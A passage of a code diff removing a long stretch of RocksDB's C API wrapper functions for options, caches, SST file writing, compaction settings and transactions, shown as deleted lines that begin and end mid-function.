-  opt->rep.verify_checksums = v;
-}
-
-void rocksdb_readoptions_set_fill_cache(
-    rocksdb_readoptions_t* opt, unsigned char v) {
-  opt->rep.fill_cache = v;
-}
-
-void rocksdb_readoptions_set_snapshot(
-    rocksdb_readoptions_t* opt,
-    const rocksdb_snapshot_t* snap) {
-  opt->rep.snapshot = (snap ? snap->rep : nullptr);
-}
-
-void rocksdb_readoptions_set_iterate_upper_bound(
-    rocksdb_readoptions_t* opt,
-    const char* key, size_t keylen) {
-  if (key == nullptr) {
-    opt->upper_bound = Slice();
-    opt->rep.iterate_upper_bound = nullptr;
-
-  } else {
-    opt->upper_bound = Slice(key, keylen);
-    opt->rep.iterate_upper_bound = &opt->upper_bound;
-  }
-}
-
-void rocksdb_readoptions_set_read_tier(
-    rocksdb_readoptions_t* opt, int v) {
-  opt->rep.read_tier = static_cast<rocksdb::ReadTier>(v);
-}
-
-void rocksdb_readoptions_set_tailing(
-    rocksdb_readoptions_t* opt, unsigned char v) {
-  opt->rep.tailing = v;
-}
-
-void rocksdb_readoptions_set_readahead_size(
-    rocksdb_readoptions_t* opt, size_t v) {
-  opt->rep.readahead_size = v;
-}
-
-void rocksdb_readoptions_set_pin_data(rocksdb_readoptions_t* opt,
-                                      unsigned char v) {
-  opt->rep.pin_data = v;
-}
-
-void rocksdb_readoptions_set_total_order_seek(rocksdb_readoptions_t* opt,
-                                              unsigned char v) {
-  opt->rep.total_order_seek = v;
-}
-
-rocksdb_writeoptions_t* rocksdb_writeoptions_create() {
-  return new rocksdb_writeoptions_t;
-}
-
-void rocksdb_writeoptions_destroy(rocksdb_writeoptions_t* opt) {
-  delete opt;
-}
-
-void rocksdb_writeoptions_set_sync(
-    rocksdb_writeoptions_t* opt, unsigned char v) {
-  opt->rep.sync = v;
-}
-
-void rocksdb_writeoptions_disable_WAL(rocksdb_writeoptions_t* opt, int disable) {
-  opt->rep.disableWAL = disable;
-}
-
-rocksdb_compactoptions_t* rocksdb_compactoptions_create() {
-  return new rocksdb_compactoptions_t;
-}
-
-void rocksdb_compactoptions_destroy(rocksdb_compactoptions_t* opt) {
-  delete opt;
-}
-
-void rocksdb_compactoptions_set_exclusive_manual_compaction(
-    rocksdb_compactoptions_t* opt, unsigned char v) {
-  opt->rep.exclusive_manual_compaction = v;
-}
-
-void rocksdb_compactoptions_set_change_level(rocksdb_compactoptions_t* opt,
-                                             unsigned char v) {
-  opt->rep.change_level = v;
-}
-
-void rocksdb_compactoptions_set_target_level(rocksdb_compactoptions_t* opt,
-                                             int n) {
-  opt->rep.target_level = n;
-}
-
-rocksdb_flushoptions_t* rocksdb_flushoptions_create() {
-  return new rocksdb_flushoptions_t;
-}
-
-void rocksdb_flushoptions_destroy(rocksdb_flushoptions_t* opt) {
-  delete opt;
-}
-
-void rocksdb_flushoptions_set_wait(
-    rocksdb_flushoptions_t* opt, unsigned char v) {
-  opt->rep.wait = v;
-}
-
-rocksdb_cache_t* rocksdb_cache_create_lru(size_t capacity) {
-  rocksdb_cache_t* c = new rocksdb_cache_t;
-  c->rep = NewLRUCache(capacity);
-  return c;
-}
-
-void rocksdb_cache_destroy(rocksdb_cache_t* cache) {
-  delete cache;
-}
-
-void rocksdb_cache_set_capacity(rocksdb_cache_t* cache, size_t capacity) {
-  cache->rep->SetCapacity(capacity);
-}
-
-size_t rocksdb_cache_get_usage(rocksdb_cache_t* cache) {
-  return cache->rep->GetUsage();
-}
-
-size_t rocksdb_cache_get_pinned_usage(rocksdb_cache_t* cache) {
-  return cache->rep->GetPinnedUsage();
-}
-
-rocksdb_dbpath_t* rocksdb_dbpath_create(const char* path, uint64_t target_size) {
-  rocksdb_dbpath_t* result = new rocksdb_dbpath_t;
-  result->rep.path = std::string(path);
-  result->rep.target_size = target_size;
-  return result;
-}
-
-void rocksdb_dbpath_destroy(rocksdb_dbpath_t* dbpath) {
-  delete dbpath;
-}
-
-rocksdb_env_t* rocksdb_create_default_env() {
-  rocksdb_env_t* result = new rocksdb_env_t;
-  result->rep = Env::Default();
-  result->is_default = true;
-  return result;
-}
-
-rocksdb_env_t* rocksdb_create_mem_env() {
-  rocksdb_env_t* result = new rocksdb_env_t;
-  result->rep = rocksdb::NewMemEnv(Env::Default());
-  result->is_default = false;
-  return result;
-}
-
-void rocksdb_env_set_background_threads(rocksdb_env_t* env, int n) {
-  env->rep->SetBackgroundThreads(n);
-}
-
-void rocksdb_env_set_high_priority_background_threads(rocksdb_env_t* env, int n) {
-  env->rep->SetBackgroundThreads(n, Env::HIGH);
-}
-
-void rocksdb_env_join_all_threads(rocksdb_env_t* env) {
-  env->rep->WaitForJoin();
-}
-
-void rocksdb_env_destroy(rocksdb_env_t* env) {
-  if (!env->is_default) delete env->rep;
-  delete env;
-}
-
-rocksdb_envoptions_t* rocksdb_envoptions_create() {
-  rocksdb_envoptions_t* opt = new rocksdb_envoptions_t;
-  return opt;
-}
-
-void rocksdb_envoptions_destroy(rocksdb_envoptions_t* opt) { delete opt; }
-
-rocksdb_sstfilewriter_t* rocksdb_sstfilewriter_create(
-    const rocksdb_envoptions_t* env, const rocksdb_options_t* io_options) {
-  rocksdb_sstfilewriter_t* writer = new rocksdb_sstfilewriter_t;
-  writer->rep = new SstFileWriter(env->rep, io_options->rep);
-  return writer;
-}
-
-rocksdb_sstfilewriter_t* rocksdb_sstfilewriter_create_with_comparator(
-    const rocksdb_envoptions_t* env, const rocksdb_options_t* io_options,
-    const rocksdb_comparator_t* comparator) {
-  rocksdb_sstfilewriter_t* writer = new rocksdb_sstfilewriter_t;
-  writer->rep = new SstFileWriter(env->rep, io_options->rep);
-  return writer;
-}
-
-void rocksdb_sstfilewriter_open(rocksdb_sstfilewriter_t* writer,
-                                const char* name, char** errptr) {
-  SaveError(errptr, writer->rep->Open(std::string(name)));
-}
-
-void rocksdb_sstfilewriter_add(rocksdb_sstfilewriter_t* writer, const char* key,
-                               size_t keylen, const char* val, size_t vallen,
-                               char** errptr) {
-  SaveError(errptr, writer->rep->Put(Slice(key, keylen), Slice(val, vallen)));
-}
-
-void rocksdb_sstfilewriter_put(rocksdb_sstfilewriter_t* writer, const char* key,
-                               size_t keylen, const char* val, size_t vallen,
-                               char** errptr) {
-  SaveError(errptr, writer->rep->Put(Slice(key, keylen), Slice(val, vallen)));
-}
-
-void rocksdb_sstfilewriter_merge(rocksdb_sstfilewriter_t* writer,
-                                 const char* key, size_t keylen,
-                                 const char* val, size_t vallen,
-                                 char** errptr) {
-  SaveError(errptr, writer->rep->Merge(Slice(key, keylen), Slice(val, vallen)));
-}
-
-void rocksdb_sstfilewriter_delete(rocksdb_sstfilewriter_t* writer,
-                                  const char* key, size_t keylen,
-                                  char** errptr) {
-  SaveError(errptr, writer->rep->Delete(Slice(key, keylen)));
-}
-
-void rocksdb_sstfilewriter_finish(rocksdb_sstfilewriter_t* writer,
-                                  char** errptr) {
-  SaveError(errptr, writer->rep->Finish(NULL));
-}
-
-void rocksdb_sstfilewriter_destroy(rocksdb_sstfilewriter_t* writer) {
-  delete writer->rep;
-  delete writer;
-}
-
-rocksdb_ingestexternalfileoptions_t*
-rocksdb_ingestexternalfileoptions_create() {
-  rocksdb_ingestexternalfileoptions_t* opt =
-      new rocksdb_ingestexternalfileoptions_t;
-  return opt;
-}
-
-void rocksdb_ingestexternalfileoptions_set_move_files(
-    rocksdb_ingestexternalfileoptions_t* opt, unsigned char move_files) {
-  opt->rep.move_files = move_files;
-}
-
-void rocksdb_ingestexternalfileoptions_set_snapshot_consistency(
-    rocksdb_ingestexternalfileoptions_t* opt,
-    unsigned char snapshot_consistency) {
-  opt->rep.snapshot_consistency = snapshot_consistency;
-}
-
-void rocksdb_ingestexternalfileoptions_set_allow_global_seqno(
-    rocksdb_ingestexternalfileoptions_t* opt,
-    unsigned char allow_global_seqno) {
-  opt->rep.allow_global_seqno = allow_global_seqno;
-}
-
-void rocksdb_ingestexternalfileoptions_set_allow_blocking_flush(
-    rocksdb_ingestexternalfileoptions_t* opt,
-    unsigned char allow_blocking_flush) {
-  opt->rep.allow_blocking_flush = allow_blocking_flush;
-}
-
-void rocksdb_ingestexternalfileoptions_destroy(
-    rocksdb_ingestexternalfileoptions_t* opt) {
-  delete opt;
-}
-
-void rocksdb_ingest_external_file(
-    rocksdb_t* db, const char* const* file_list, const size_t list_len,
-    const rocksdb_ingestexternalfileoptions_t* opt, char** errptr) {
-  std::vector<std::string> files(list_len);
-  for (size_t i = 0; i < list_len; ++i) {
-    files[i] = std::string(file_list[i]);
-  }
-  SaveError(errptr, db->rep->IngestExternalFile(files, opt->rep));
-}
-
-void rocksdb_ingest_external_file_cf(
-    rocksdb_t* db, rocksdb_column_family_handle_t* handle,
-    const char* const* file_list, const size_t list_len,
-    const rocksdb_ingestexternalfileoptions_t* opt, char** errptr) {
-  std::vector<std::string> files(list_len);
-  for (size_t i = 0; i < list_len; ++i) {
-    files[i] = std::string(file_list[i]);
-  }
-  SaveError(errptr, db->rep->IngestExternalFile(handle->rep, files, opt->rep));
-}
-
-rocksdb_slicetransform_t* rocksdb_slicetransform_create(
-    void* state,
-    void (*destructor)(void*),
-    char* (*transform)(
-        void*,
-        const char* key, size_t length,
-        size_t* dst_length),
-    unsigned char (*in_domain)(
-        void*,
-        const char* key, size_t length),
-    unsigned char (*in_range)(
-        void*,
-        const char* key, size_t length),
-    const char* (*name)(void*)) {
-  rocksdb_slicetransform_t* result = new rocksdb_slicetransform_t;
-  result->state_ = state;
-  result->destructor_ = destructor;
-  result->transform_ = transform;
-  result->in_domain_ = in_domain;
-  result->in_range_ = in_range;
-  result->name_ = name;
-  return result;
-}
-
-void rocksdb_slicetransform_destroy(rocksdb_slicetransform_t* st) {
-  delete st;
-}
-
-rocksdb_slicetransform_t* rocksdb_slicetransform_create_fixed_prefix(size_t prefixLen) {
-  struct Wrapper : public rocksdb_slicetransform_t {
-    const SliceTransform* rep_;
-    ~Wrapper() { delete rep_; }
-    const char* Name() const override { return rep_->Name(); }
-    Slice Transform(const Slice& src) const override {
-      return rep_->Transform(src);
-    }
-    bool InDomain(const Slice& src) const override {
-      return rep_->InDomain(src);
-    }
-    bool InRange(const Slice& src) const override { return rep_->InRange(src); }
-    static void DoNothing(void*) { }
-  };
-  Wrapper* wrapper = new Wrapper;
-  wrapper->rep_ = rocksdb::NewFixedPrefixTransform(prefixLen);
-  wrapper->state_ = nullptr;
-  wrapper->destructor_ = &Wrapper::DoNothing;
-  return wrapper;
-}
-
-rocksdb_slicetransform_t* rocksdb_slicetransform_create_noop() {
-  struct Wrapper : public rocksdb_slicetransform_t {
-    const SliceTransform* rep_;
-    ~Wrapper() { delete rep_; }
-    const char* Name() const override { return rep_->Name(); }
-    Slice Transform(const Slice& src) const override {
-      return rep_->Transform(src);
-    }
-    bool InDomain(const Slice& src) const override {
-      return rep_->InDomain(src);
-    }
-    bool InRange(const Slice& src) const override { return rep_->InRange(src); }
-    static void DoNothing(void*) { }
-  };
-  Wrapper* wrapper = new Wrapper;
-  wrapper->rep_ = rocksdb::NewNoopTransform();
-  wrapper->state_ = nullptr;
-  wrapper->destructor_ = &Wrapper::DoNothing;
-  return wrapper;
-}
-
-rocksdb_universal_compaction_options_t* rocksdb_universal_compaction_options_create() {
-  rocksdb_universal_compaction_options_t* result = new rocksdb_universal_compaction_options_t;
-  result->rep = new rocksdb::CompactionOptionsUniversal;
-  return result;
-}
-
-void rocksdb_universal_compaction_options_set_size_ratio(
-  rocksdb_universal_compaction_options_t* uco, int ratio) {
-  uco->rep->size_ratio = ratio;
-}
-
-void rocksdb_universal_compaction_options_set_min_merge_width(
-  rocksdb_universal_compaction_options_t* uco, int w) {
-  uco->rep->min_merge_width = w;
-}
-
-void rocksdb_universal_compaction_options_set_max_merge_width(
-  rocksdb_universal_compaction_options_t* uco, int w) {
-  uco->rep->max_merge_width = w;
-}
-
-void rocksdb_universal_compaction_options_set_max_size_amplification_percent(
-  rocksdb_universal_compaction_options_t* uco, int p) {
-  uco->rep->max_size_amplification_percent = p;
-}
-
-void rocksdb_universal_compaction_options_set_compression_size_percent(
-  rocksdb_universal_compaction_options_t* uco, int p) {
-  uco->rep->compression_size_percent = p;
-}
-
-void rocksdb_universal_compaction_options_set_stop_style(
-  rocksdb_universal_compaction_options_t* uco, int style) {
-  uco->rep->stop_style = static_cast<rocksdb::CompactionStopStyle>(style);
-}
-
-void rocksdb_universal_compaction_options_destroy(
-  rocksdb_universal_compaction_options_t* uco) {
-  delete uco->rep;
-  delete uco;
-}
-
-rocksdb_fifo_compaction_options_t* rocksdb_fifo_compaction_options_create() {
-  rocksdb_fifo_compaction_options_t* result = new rocksdb_fifo_compaction_options_t;
-  result->rep =  CompactionOptionsFIFO();
-  return result;
-}
-
-void rocksdb_fifo_compaction_options_set_max_table_files_size(
-    rocksdb_fifo_compaction_options_t* fifo_opts, uint64_t size) {
-  fifo_opts->rep.max_table_files_size = size;
-}
-
-void rocksdb_fifo_compaction_options_destroy(
-    rocksdb_fifo_compaction_options_t* fifo_opts) {
-  delete fifo_opts;
-}
-
-void rocksdb_options_set_min_level_to_compress(rocksdb_options_t* opt, int level) {
-  if (level >= 0) {
-    assert(level <= opt->rep.num_levels);
-    opt->rep.compression_per_level.resize(opt->rep.num_levels);
-    for (int i = 0; i < level; i++) {
-      opt->rep.compression_per_level[i] = rocksdb::kNoCompression;
-    }
-    for (int i = level; i < opt->rep.num_levels; i++) {
-      opt->rep.compression_per_level[i] = opt->rep.compression;
-    }
-  }
-}
-
-int rocksdb_livefiles_count(
-  const rocksdb_livefiles_t* lf) {
-  return static_cast<int>(lf->rep.size());
-}
-
-const char* rocksdb_livefiles_name(
-  const rocksdb_livefiles_t* lf,
-  int index) {
-  return lf->rep[index].name.c_str();
-}
-
-int rocksdb_livefiles_level(
-  const rocksdb_livefiles_t* lf,
-  int index) {
-  return lf->rep[index].level;
-}
-
-size_t rocksdb_livefiles_size(
-  const rocksdb_livefiles_t* lf,
-  int index) {
-  return lf->rep[index].size;
-}
-
-const char* rocksdb_livefiles_smallestkey(
-  const rocksdb_livefiles_t* lf,
-  int index,
-  size_t* size) {
-  *size = lf->rep[index].smallestkey.size();
-  return lf->rep[index].smallestkey.data();
-}
-
-const char* rocksdb_livefiles_largestkey(
-  const rocksdb_livefiles_t* lf,
-  int index,
-  size_t* size) {
-  *size = lf->rep[index].largestkey.size();
-  return lf->rep[index].largestkey.data();
-}
-
-extern void rocksdb_livefiles_destroy(
-  const rocksdb_livefiles_t* lf) {
-  delete lf;
-}
-
-void rocksdb_get_options_from_string(const rocksdb_options_t* base_options,
-                                     const char* opts_str,
-                                     rocksdb_options_t* new_options,
-                                     char** errptr) {
-  SaveError(errptr,
-            GetOptionsFromString(base_options->rep, std::string(opts_str),
-                                 &new_options->rep));
-}
-
-void rocksdb_delete_file_in_range(rocksdb_t* db, const char* start_key,
-                                  size_t start_key_len, const char* limit_key,
-                                  size_t limit_key_len, char** errptr) {
-  Slice a, b;
-  SaveError(
-      errptr,
-      DeleteFilesInRange(
-          db->rep, db->rep->DefaultColumnFamily(),
-          (start_key ? (a = Slice(start_key, start_key_len), &a) : nullptr),
-          (limit_key ? (b = Slice(limit_key, limit_key_len), &b) : nullptr)));
-}
-
-void rocksdb_delete_file_in_range_cf(
-    rocksdb_t* db, rocksdb_column_family_handle_t* column_family,
-    const char* start_key, size_t start_key_len, const char* limit_key,
-    size_t limit_key_len, char** errptr) {
-  Slice a, b;
-  SaveError(
-      errptr,
-      DeleteFilesInRange(
-          db->rep, column_family->rep,
-          (start_key ? (a = Slice(start_key, start_key_len), &a) : nullptr),
-          (limit_key ? (b = Slice(limit_key, limit_key_len), &b) : nullptr)));
-}
-
-rocksdb_transactiondb_options_t* rocksdb_transactiondb_options_create() {
-  return new rocksdb_transactiondb_options_t;
-}
-
-void rocksdb_transactiondb_options_destroy(rocksdb_transactiondb_options_t* opt){
-  delete opt;
-}
-
-void rocksdb_transactiondb_options_set_max_num_locks(
-    rocksdb_transactiondb_options_t* opt, int64_t max_num_locks) {
-  opt->rep.max_num_locks = max_num_locks;
-}
-
-void rocksdb_transactiondb_options_set_num_stripes(
-    rocksdb_transactiondb_options_t* opt, size_t num_stripes) {
-  opt->rep.num_stripes = num_stripes;
-}
-
-void rocksdb_transactiondb_options_set_transaction_lock_timeout(
-    rocksdb_transactiondb_options_t* opt, int64_t txn_lock_timeout) {
-  opt->rep.transaction_lock_timeout = txn_lock_timeout;
-}
-
-void rocksdb_transactiondb_options_set_default_lock_timeout(
-    rocksdb_transactiondb_options_t* opt, int64_t default_lock_timeout) {
-  opt->rep.default_lock_timeout = default_lock_timeout;
-}
-
-rocksdb_transaction_options_t* rocksdb_transaction_options_create() {
-  return new rocksdb_transaction_options_t;
-}
-
-void rocksdb_transaction_options_destroy(rocksdb_transaction_options_t* opt) {
-  delete opt;
-}
-
-void rocksdb_transaction_options_set_set_snapshot(
-    rocksdb_transaction_options_t* opt, unsigned char v) {
-  opt->rep.set_snapshot = v;
-}
-
-void rocksdb_transaction_options_set_deadlock_detect(
-    rocksdb_transaction_options_t* opt, unsigned char v) {
-  opt->rep.deadlock_detect = v;
-}
-
-void rocksdb_transaction_options_set_lock_timeout(
-    rocksdb_transaction_options_t* opt, int64_t lock_timeout) {
-  opt->rep.lock_timeout = lock_timeout;
-}
-
-void rocksdb_transaction_options_set_expiration(
-    rocksdb_transaction_options_t* opt, int64_t expiration) {
-  opt->rep.expiration = expiration;
-}
-
-void rocksdb_transaction_options_set_deadlock_detect_depth(
-    rocksdb_transaction_options_t* opt, int64_t depth) {
-  opt->rep.deadlock_detect_depth = depth;
-}
-
-void rocksdb_transaction_options_set_max_write_batch_size(
-    rocksdb_transaction_options_t* opt, size_t size) {
-  opt->rep.max_write_batch_size = size;
-}
-
-rocksdb_optimistictransaction_options_t*
-rocksdb_optimistictransaction_options_create() {
-  return new rocksdb_optimistictransaction_options_t;
-}
-
-void rocksdb_optimistictransaction_options_destroy(
-    rocksdb_optimistictransaction_options_t* opt) {
-  delete opt;
-}
-
-void rocksdb_optimistictransaction_options_set_set_snapshot(
-    rocksdb_optimistictransaction_options_t* opt, unsigned char v) {
-  opt->rep.set_snapshot = v;
-}
-
-rocksdb_column_family_handle_t* rocksdb_transactiondb_create_column_family(
-    rocksdb_transactiondb_t* txn_db,
-    const rocksdb_options_t* column_family_options,
-    const char* column_family_name, char** errptr) {
-  rocksdb_column_family_handle_t* handle = new rocksdb_column_family_handle_t;
-  SaveError(errptr, txn_db->rep->CreateColumnFamily(
-                        ColumnFamilyOptions(column_family_options->rep),
-                        std::string(column_family_name), &(handle->rep)));
-  return handle;
-}
-
-rocksdb_transactiondb_t* rocksdb_transactiondb_open(
-    const rocksdb_options_t* options,
-    const rocksdb_transactiondb_options_t* txn_db_options, const char* name,
-    char** errptr) {
-  TransactionDB* txn_db;
-  if (SaveError(errptr, TransactionDB::Open(options->rep, txn_db_options->rep,
-                                            std::string(name), &txn_db))) {
-    return nullptr;
-  }
-  rocksdb_transactiondb_t* result = new rocksdb_transactiondb_t;
-  result->rep = txn_db;
-  return result;
-}
-
-const rocksdb_snapshot_t* rocksdb_transactiondb_create_snapshot(
-    rocksdb_transactiondb_t* txn_db) {
-  rocksdb_snapshot_t* result = new rocksdb_snapshot_t;
-  result->rep = txn_db->rep->GetSnapshot();
-  return result;
-}
-
-void rocksdb_transactiondb_release_snapshot(
-    rocksdb_transactiondb_t* txn_db, const rocksdb_snapshot_t* snapshot) {
-  txn_db->rep->ReleaseSnapshot(snapshot->rep);
-  delete snapshot;
-}
-
-rocksdb_transaction_t* rocksdb_transaction_begin(
-    rocksdb_transactiondb_t* txn_db,
-    const rocksdb_writeoptions_t* write_options,
-    const rocksdb_transaction_options_t* txn_options,
-    rocksdb_transaction_t* old_txn) {
-  if (old_txn == nullptr) {
-    rocksdb_transaction_t* result = new rocksdb_transaction_t;
-    result->rep = txn_db->rep->BeginTransaction(write_options->rep,
-                                                txn_options->rep, nullptr);
-    return result;
-  }
-  old_txn->rep = txn_db->rep->BeginTransaction(write_options->rep,
-                                                txn_options->rep, old_txn->rep);
-  return old_txn;
-}
-
-void rocksdb_transaction_commit(rocksdb_transaction_t* txn, char** errptr) {
-  SaveError(errptr, txn->rep->Commit());
-}
-
-void rocksdb_transaction_rollback(rocksdb_transaction_t* txn, char** errptr) {
-  SaveError(errptr, txn->rep->Rollback());
-}
-
-void rocksdb_transaction_destroy(rocksdb_transaction_t* txn) {
-  delete txn->rep;
-  delete txn;
-}
-
-const rocksdb_snapshot_t* rocksdb_transaction_get_snapshot(
-    rocksdb_transaction_t* txn) {
-  rocksdb_snapshot_t* result = new rocksdb_snapshot_t;
-  result->rep = txn->rep->GetSnapshot();
-  return result;
-}
-
-// Read a key inside a transaction
-char* rocksdb_transaction_get(rocksdb_transaction_t* txn,
-                              const rocksdb_readoptions_t* options,
-                              const char* key, size_t klen, size_t* vlen,
-                              char** errptr) {
-  char* result = nullptr;
-  std::string tmp;
-  Status s = txn->rep->Get(options->rep, Slice(key, klen), &tmp);
-  if (s.ok()) {
-    *vlen = tmp.size();
-    result = CopyString(tmp);
-  } else {
-    *vlen = 0;
-    if (!s.IsNotFound()) {
-      SaveError(errptr, s);
-    }
-  }
-  return result;
-}
-
-char* rocksdb_transaction_get_cf(rocksdb_transaction_t* txn,
-                                 const rocksdb_readoptions_t* options,
-                                 rocksdb_column_family_handle_t* column_family,
-                                 const char* key, size_t klen, size_t* vlen,
-                                 char** errptr) {
-  char* result = nullptr;
-  std::string tmp;
-  Status s =
-      txn->rep->Get(options->rep, column_family->rep, Slice(key, klen), &tmp);
-  if (s.ok()) {
-    *vlen = tmp.size();
-    result = CopyString(tmp);
-  } else {
-    *vlen = 0;
-    if (!s.IsNotFound()) {
-      SaveError(errptr, s);
-    }
-  }
-  return result;
-}
-
-// Read a key inside a transaction
-char* rocksdb_transaction_get_for_update(rocksdb_transaction_t* txn,
-                                         const rocksdb_readoptions_t* options,
-                                         const char* key, size_t klen,
-                                         size_t* vlen, unsigned char exclusive,
-                                         char** errptr) {
-  char* result = nullptr;
-  std::string tmp;
-  Status s =
-      txn->rep->GetForUpdate(options->rep, Slice(key, klen), &tmp, exclusive);
-  if (s.ok()) {
-    *vlen = tmp.size();
-    result = CopyString(tmp);
-  } else {
-    *vlen = 0;
-    if (!s.IsNotFound()) {
-      SaveError(errptr, s);
-    }
-  }
-  return result;
-}
-
-// Read a key outside a transaction
-char* rocksdb_transactiondb_get(
-    rocksdb_transactiondb_t* txn_db,
-    const rocksdb_readoptions_t* options,
-    const char* key, size_t klen,
-    size_t* vlen,
-    char** errptr){
-  char* result = nullptr;
-  std::string tmp;
-  Status s = txn_db->rep->Get(options->rep, Slice(key, klen), &tmp);
-  if (s.ok()) {
-    *vlen = tmp.size();
-    result = CopyString(tmp);
-  } else {
-    *vlen = 0;
-    if (!s.IsNotFound()) {
-      SaveError(errptr, s);
-    }
-  }
-  return result;
-}
-
-char* rocksdb_transactiondb_get_cf(
-    rocksdb_transactiondb_t* txn_db, const rocksdb_readoptions_t* options,
-    rocksdb_column_family_handle_t* column_family, const char* key,
-    size_t keylen, size_t* vallen, char** errptr) {
-  char* result = nullptr;
-  std::string tmp;
-  Status s = txn_db->rep->Get(options->rep, column_family->rep,
-                              Slice(key, keylen), &tmp);
-  if (s.ok()) {
-    *vallen = tmp.size();
-    result = CopyString(tmp);
-  } else {
-    *vallen = 0;
-    if (!s.IsNotFound()) {
-      SaveError(errptr, s);
-    }
-  }
-  return result;
-}
-
-// Put a key inside a transaction
-void rocksdb_transaction_put(rocksdb_transaction_t* txn, const char* key,
-                             size_t klen, const char* val, size_t vlen,
-                             char** errptr) {
-  SaveError(errptr, txn->rep->Put(Slice(key, klen), Slice(val, vlen)));
-}
-
-void rocksdb_transaction_put_cf(rocksdb_transaction_t* txn,
-                                rocksdb_column_family_handle_t* column_family,
-                                const char* key, size_t klen, const char* val,
-                                size_t vlen, char** errptr) {
-  SaveError(errptr, txn->rep->Put(column_family->rep, Slice(key, klen),
-                                  Slice(val, vlen)));
-}
-
-// Put a key outside a transaction
-void rocksdb_transactiondb_put(rocksdb_transactiondb_t* txn_db,
-                               const rocksdb_writeoptions_t* options,
-                               const char* key, size_t klen, const char* val,
-                               size_t vlen, char** errptr) {
-  SaveError(errptr, txn_db->rep->Put(options->rep, Slice(key, klen), 
-                                     Slice(val, vlen)));
-}
-
-void rocksdb_transactiondb_put_cf(rocksdb_transactiondb_t* txn_db,
-                                  const rocksdb_writeoptions_t* options,
-                                  rocksdb_column_family_handle_t* column_family,
-                                  const char* key, size_t keylen,
-                                  const char* val, size_t vallen,
-                                  char** errptr) {
-  SaveError(errptr, txn_db->rep->Put(options->rep, column_family->rep,
-                                     Slice(key, keylen), Slice(val, vallen)));
-}
-
-// Write batch into transaction db
-void rocksdb_transactiondb_write(
-        rocksdb_transactiondb_t* db,
-        const rocksdb_writeoptions_t* options,
-        rocksdb_writebatch_t* batch,
-        char** errptr) {
-  SaveError(errptr, db->rep->Write(options->rep, &batch->rep));
-}
-
-// Merge a key inside a transaction
-void rocksdb_transaction_merge(rocksdb_transaction_t* txn, const char* key,
-                               size_t klen, const char* val, size_t vlen,
-                               char** errptr) {
-  SaveError(errptr, txn->rep->Merge(Slice(key, klen), Slice(val, vlen)));
-}
-
-// Merge a key outside a transaction
-void rocksdb_transactiondb_merge(rocksdb_transactiondb_t* txn_db,
-                                 const rocksdb_writeoptions_t* options,
-                                 const char* key, size_t klen, const char* val,
-                                 size_t vlen, char** errptr) {
-  SaveError(errptr,
-    txn_db->rep->Merge(options->rep, Slice(key, klen), Slice(val, vlen)));
-}
-
-// Delete a key inside a transaction
-void rocksdb_transaction_delete(rocksdb_transaction_t* txn, const char* key,
-                                size_t klen, char** errptr) {
-  SaveError(errptr, txn->rep->Delete(Slice(key, klen)));
-}
-
-void rocksdb_transaction_delete_cf(
-    rocksdb_transaction_t* txn, rocksdb_column_family_handle_t* column_family,
-    const char* key, size_t klen, char** errptr) {
-  SaveError(errptr, txn->rep->Delete(column_family->rep, Slice(key, klen)));
-}
-
-// Delete a key outside a transaction
-void rocksdb_transactiondb_delete(rocksdb_transactiondb_t* txn_db,
-                                  const rocksdb_writeoptions_t* options,
-                                  const char* key, size_t klen, char** errptr) {
-  SaveError(errptr, txn_db->rep->Delete(options->rep, Slice(key, klen)));
-}
-
-void rocksdb_transactiondb_delete_cf(
-    rocksdb_transactiondb_t* txn_db, const rocksdb_writeoptions_t* options,
-    rocksdb_column_family_handle_t* column_family, const char* key,
-    size_t keylen, char** errptr) {
-  SaveError(errptr, txn_db->rep->Delete(options->rep, column_family->rep,
-                                        Slice(key, keylen)));
-}
-
-// Create an iterator inside a transaction
-rocksdb_iterator_t* rocksdb_transaction_create_iterator(
-    rocksdb_transaction_t* txn, const rocksdb_readoptions_t* options) {
-  rocksdb_iterator_t* result = new rocksdb_iterator_t;
-  result->rep = txn->rep->GetIterator(options->rep);
-  return result;
-}
-
-// Create an iterator outside a transaction
-rocksdb_iterator_t* rocksdb_transactiondb_create_iterator(
-    rocksdb_transactiondb_t* txn_db, const rocksdb_readoptions_t* options) {
-  rocksdb_iterator_t* result = new rocksdb_iterator_t;
-  result->rep = txn_db->rep->NewIterator(options->rep);
-  return result;
-}
-
-void rocksdb_transactiondb_close(rocksdb_transactiondb_t* txn_db) {
-  delete txn_db->rep;
-  delete txn_db;
-}
-
-rocksdb_checkpoint_t* rocksdb_transactiondb_checkpoint_object_create(
-    rocksdb_transactiondb_t* txn_db, char** errptr) {
-  Checkpoint* checkpoint;
-  if (SaveError(errptr, Checkpoint::Create(txn_db->rep, &checkpoint))) {
-    return nullptr;
-  }
-  rocksdb_checkpoint_t* result = new rocksdb_checkpoint_t;
-  result->rep = checkpoint;
-  return result;
-}
-
-rocksdb_optimistictransactiondb_t* rocksdb_optimistictransactiondb_open(
-    const rocksdb_options_t* options, const char* name,
-    char** errptr) {
-  OptimisticTransactionDB* otxn_db;
-  if (SaveError(errptr, OptimisticTransactionDB::Open(
-                            options->rep, std::string(name), &otxn_db))) {
-    return nullptr;
-  }
-  rocksdb_optimistictransactiondb_t* result =
-      new rocksdb_optimistictransactiondb_t;
-  result->rep = otxn_db;
-  return result;
-}
-
-rocksdb_transaction_t* rocksdb_optimistictransaction_begin(
-    rocksdb_optimistictransactiondb_t* otxn_db,
-    const rocksdb_writeoptions_t* write_options,
-    const rocksdb_optimistictransaction_options_t* otxn_options,
-    rocksdb_transaction_t* old_txn) {
-  if (old_txn == nullptr) {
-    rocksdb_transaction_t* result = new rocksdb_transaction_t;
-    result->rep = otxn_db->rep->BeginTransaction(write_options->rep,
-                                                 otxn_options->rep, nullptr);
-    return result;
-  }
-  old_txn->rep = otxn_db->rep->BeginTransaction(
-      write_options->rep, otxn_options->rep, old_txn->rep);
-  return old_txn;
-}
-
-void rocksdb_optimistictransactiondb_close(
-    rocksdb_optimistictransactiondb_t* otxn_db) {
-  delete otxn_db->rep;
-  delete otxn_db;
-}
-
-void rocksdb_free(void* ptr) { free(ptr); }
-
-rocksdb_pinnableslice_t* rocksdb_get_pinned(
-    rocksdb_t* db, const rocksdb_readoptions_t* options, const char* key,
-    size_t keylen, char** errptr) {
-  rocksdb_pinnableslice_t* v = new (rocksdb_pinnableslice_t);
-  Status s = db->rep->Get(options->rep, db->rep->DefaultColumnFamily(),
-                          Slice(key, keylen), &v->rep);
-  if (!s.ok()) {
-    delete (v);
-    if (!s.IsNotFound()) {
-      SaveError(errptr, s);
-    }
-    return NULL;
-  }
-  return v;
-}
-
-rocksdb_pinnableslice_t* rocksdb_get_pinned_cf(
-    rocksdb_t* db, const rocksdb_readoptions_t* options,
